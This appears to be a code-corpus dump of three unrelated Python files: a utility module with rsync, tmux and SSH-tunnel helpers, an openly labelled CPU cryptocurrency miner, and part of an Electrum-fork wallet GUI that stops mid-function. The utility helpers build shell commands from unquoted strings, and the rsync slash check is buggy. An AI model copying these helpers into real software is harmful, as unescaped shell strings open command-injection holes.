@classmethod
def from_file(self, path):
with open(path, 'r') as f:
d = json.load(f)
return JSONPicklable.from_json(d)
class InitPicklable(object):
def __new__(cls, *args, **kwargs):
obj = super(InitPicklable, cls).__new__(cls)
obj.__initargs = args, kwargs
return obj
def __getstate__(self):
return self.__initargs
def __setstate__(self, state):
args, kwargs = state
self.__init__(*args, **kwargs)
def sub_dirs(root_dir):
"""Return a list of all sub-directory paths.
Example:
>> root_dir = '/Users/Kelvin/data'
>> sub_dirs(root_dir)
['/Users/Kelvin/data/a', '/Users/Kelvin/data/b']
"""
dir_paths = []
for path in os.listdir(root_dir):
full_path = join(root_dir, path)
if os.path.isdir(full_path):
dir_paths.append(full_path)
return dir_paths
class IntegerDirectories(Mapping):
"""Keep track of directories with names of the form "{integer}_{something}" or just "{integer}"."""
def __init__(self, root_dir):
self.root_dir = root_dir
makedirs(root_dir)
@property
def _ints_to_paths(self):
ints_to_paths = {}
for p in sub_dirs(self.root_dir):
name = os.path.basename(p)
try:
i = int(name.split('_')[0])
if i in ints_to_paths:
raise IOError("Multiple directories with the same integer prefix: {} and {}".format(
ints_to_paths[i], p))
ints_to_paths[i] = p
except ValueError:
# the first element was not an integer
pass
# put into an ordered dict
ordered = OrderedDict()
for i in sorted(ints_to_paths):
ordered[i] = ints_to_paths[i]
return ordered
def __len__(self):
return len(self._ints_to_paths)
@property
def largest_int(self):
"""Largest int among the integer directories."""
if len(self._ints_to_paths) == 0:
return None
return max(self._ints_to_paths)
def new_dir(self, name=None):
"""Create a new directory and return its path."""
if self.largest_int is None:
idx = 0
else:
idx = self.largest_int + 1
path = join(self.root_dir, str(idx))
if name:
path = '{}_{}'.format(path, name) # add name as suffix
makedirs(path)
return path
def __getitem__(self, i):
"""Get the path to directory i.
Raises:
KeyError, if directory does not exist.
"""
if i not in self._ints_to_paths:
raise KeyError("Directory #{} not found".format(i))
return self._ints_to_paths[i]
def __iter__(self):
return iter(self._ints_to_paths)
def rsync(src_path, dest_path, src_host=None, dest_host=None, delete=False):
"""Sync a file/directory from one machine to another machine.
Args:
src_path (str): a file or directory on the source machine.
dest_path (str): the corresponding file or directory on the target machine.
src_host (str): the address of the source machine. Default is local machine.
dest_host (str): the address of the target machine. Default is local machine.
delete (bool): default is False. If True, deletes any extraneous files at the destination not
present at the source!
Options used:
-r: recurse into directories
-l: copy symlinks as symlinks
-v: verbose
-z: compress files during transfer
-t: preserve times (needed for rsync to recognize that files haven't changed since last update!)
--delete: delete any extraneous files at the destination
--progress: show progress
"""
if os.path.isdir(src_path):
if src_path[:-1] != '/':
src_path += '/' # add missing trailing slash
def format_address(host, path):
if host is None:
return path
else:
return '{}:{}'.format(host, path)
cmds = ["rsync", "-rlvzt", "--progress"]
if delete:
cmds.append('--delete')
cmds.append(format_address(src_host, src_path))
cmds.append(format_address(dest_host, dest_path))
cmd = ' '.join(cmds)
local(cmd)
def num_lines(file_path):
"""Count the number of lines in a file.
Uses the `wc` command line tool.
Args:
file_path (str)
Returns:
int
"""
return int(local('wc -l {}'.format(file_path), capture=True).split()[0])
class Tmux(object):
def __init__(self, name, cwd=None):
"""Create a tmux session.
Args:
name (str): name of the new session
cwd (str): initial directory of the session
Options used:
-d: do not attach to the new session
-s: specify a name for the session
"""
self.name = name
with settings(hide('warnings'), warn_only=True):
result = local("tmux new -d -s {}".format(name)) # start tmux session
if result.failed:
raise TmuxSessionExists()
if cwd is None:
cwd = os.getcwd()
# move to current directory
self.run("cd {}".format(cwd))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def run(self, command):
"""Run command in tmux session.
Assume that the session has only one window.
Args:
command (str)
"""
local('tmux send -t {} "{}" Enter'.format(self.name, command))
def close(self):
local("tmux kill-session -t {}".format(self.name))
class TmuxSessionExists(Exception):
pass
def tunnel(local_port, host, target, target_port, tmux_name, autossh_port=20000):
"""Make a port on a target machine appear as if it is a port on our local machine.
Uses autossh to keep the tunnel open even with interruptions.
Runs autossh in a new tmux session, so that it can be monitored.
Args:
local_port (int): a port on this machine, e.g. 18888
host (str): the machine that will be used to create the SSH tunnel, e.g. `kgu@jamie.stanford.edu` or just `jamie`
if we have that alias configured in ~/.ssh/config.
target (str): the address of the target machine, e.g. `kgu@john11.stanford.edu` or just `john11`. The address
should be RELATIVE to the host machine.
target_port (int): port on the target machine, e.g. 8888
tmux_name (str): name of the tmux session that will be running the autossh command.
autossh_port (int): local port used by autossh to monitor the connection. Cannot be used by more than one
autossh process at a time!
"""
command = "autossh -M {} -N -n -T -L {}:{}:{} {}".format(autossh_port, local_port, target, target_port, host)
tmux = Tmux(tmux_name)
tmux.run(command)
class Workspace(object):
"""Manage paths underneath a top-level root directory.
Paths are registered with this Workspace. An IOError is thrown if the path has already been registered before.
"""
def __init__(self, root):
"""Create a Workspace.
Args:
root (str): absolute path of the top-level directory.
"""
self._root = root
makedirs(root)
self._paths = set()
@property
def root(self):
return self._root
def _add(self, name, relative_path):
"""Register a path.
Args:
name (str): short name to reference the path
relative_path (str): a relative path, relative to the workspace root.
Returns:
self
"""
full_path = join(self._root, relative_path)
if hasattr(self, name):
raise IOError('Name already registered: {}'.format(name))
if full_path in self._paths:
raise IOError('Path already registered: {}'.format(relative_path))
setattr(self, name, full_path)
def add_dir(self, name, relative_path=None):
"""Register a directory.
If no relative path is specified, it is assumed that the name
is the relative path.
Args:
name (str)
relative_path (str)
"""
if relative_path is None:
relative_path = name
self._add(name, relative_path)
makedirs(getattr(self, name))
def add_file(self, name, relative_path):
self._add(name, relative_path)
def split_path(path):
"""Break a file path into its components.
Args:
path (str): e.g. '/Users/Joe/Documents/file.txt'
Returns:
elements (list[str]): e.g. ['Users', 'Joe', 'Documents', 'file.txt']
"""
elements = []
dir_name = path
while True:
dir_name, leaf = os.path.split(dir_name)
if leaf:
elements.append(leaf)
else:
break
return list(reversed(elements))
@contextmanager
def lines_in_file(path, limit=float('inf'), desc=None, compute_total=True):
from gtd.chrono import verboserate
if compute_total:
total = min(num_lines(path), limit) # compute total lines in file
else:
total = None
with codecs.open(path, 'r', encoding='utf-8') as lines:
if desc:
lines = verboserate(lines, desc=desc, total=total)
if limit:
lines = truncated(lines, limit)
yield lines |
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Cornellieis developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class CornellieisRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = CornellieisRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum_mona
from electrum_mona import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum_mona.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_mona.plugin import run_hook
from electrum_mona.i18n import _
from electrum_mona.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, InvoiceError)
from electrum_mona.util import PR_TYPE_ONCHAIN, PR_TYPE_LN
from electrum_mona.lnutil import PaymentFailure, SENT, RECEIVED
from electrum_mona.transaction import Transaction, TxOutput
from electrum_mona.address_synchronizer import AddTransactionException
from electrum_mona.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_mona.version import ELECTRUM_VERSION
from electrum_mona.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_mona.exchange_rate import FxThread
from electrum_mona.simple_config import SimpleConfig
from electrum_mona.logging import Logger
from electrum_mona.util import PR_PAID, PR_UNPAID, PR_INFLIGHT, PR_FAILED
from electrum_mona.util import pr_expiration_values
from electrum_mona.masternode_manager import MasternodeManager
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
MONOSPACE_FONT)
from .util import ButtonsTextEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.masternode_manager = None
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.send_tab_is_onchain = False
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.masternode_tab = self.create_masternode_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
#self.channels_tab = self.create_channels_tab(wallet)
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
tabs.addTab(self.masternode_tab, read_QIcon("tab_history.png"), _('Masternodes'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
#if self.wallet.has_lightning():
# add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'invoice_status', 'request_status']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
#elif event == 'channels_updated':
# self.channels_list.update_rows.emit(*args)
#elif event == 'channel':
# self.channels_list.update_single_row.emit(*args)
# self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.lnworker:
wallet.lnworker.on_channels_updated()
self.masternode_manager = MasternodeManager(self.wallet, self.config)
self.masternode_tab.update_nodelist(self.wallet, self.config, self.masternode_manager)
self.wallet.set_sync_masternode_manager(self.masternode_manager)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
#self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-ZCore Testnet" if constants.net.TESTNET else "Electrum-ZCore"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
